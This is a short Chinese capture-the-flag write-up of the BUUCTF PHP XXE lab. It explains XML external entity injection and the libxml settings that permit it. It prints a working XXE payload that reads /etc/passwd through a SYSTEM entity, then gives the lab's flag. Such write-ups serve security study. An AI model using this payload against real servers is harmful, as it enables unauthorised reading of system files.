BUUCTF-Real-[PHP]XXE

作者：算法编织者 | 2024-02-01 11:51:12

踩

1、原理

1、原理


XML数据在传输过程中，攻击者强制XML解析器去访问攻击者指定的资源内容（本地/远程），外部实体声明关键字'SYSTEM'会令XML解析器读取数据，并允许它在XML文档中被替换，构造恶意的值，去执行！
 
XML解析方式：DOM，SAX，JDOM，DOM4J，StAX……都可能会出现外部实体注入漏洞

2、XXE漏洞产生的原因


低版本php
 
libxml<2.9.1
 
设置了libxml_disable_entity_loader为FALSE

3、开始复现


libxml2.9.0以后，默认不解析外部实体，导致XXE漏洞稀少！
 
dom.php、SimpleXMLElement.php、simplexml_load_string.php都可以触发XXE漏洞

paylaod


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
    <!ELEMENT name ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
    <name>&xxe;</name>
</root>

复现


这里我用的是 SimpleXMLElement.php 
 
这里使用payload查看了/etc/passwd文件！证实了xxe漏洞可以进行文件读取！

4、flag


是的，在主页就可以找到！
 
flag{ad2eb59a-d433-4168-99ce-a27245df049b}

声明：本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：【wpsshop博客】